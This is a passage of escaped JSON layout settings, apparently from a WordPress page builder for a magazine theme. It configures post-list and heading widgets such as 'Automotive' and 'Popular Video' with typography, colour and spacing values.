st_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"1\",\"category\":[\"9\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"15\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"o9ytl3o\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Automotive\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#266cc9\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"wfue86x\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"4\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"3gb3qhx\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"1\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"15\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"08b9qjc\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Popular Video\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#a66bbe\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\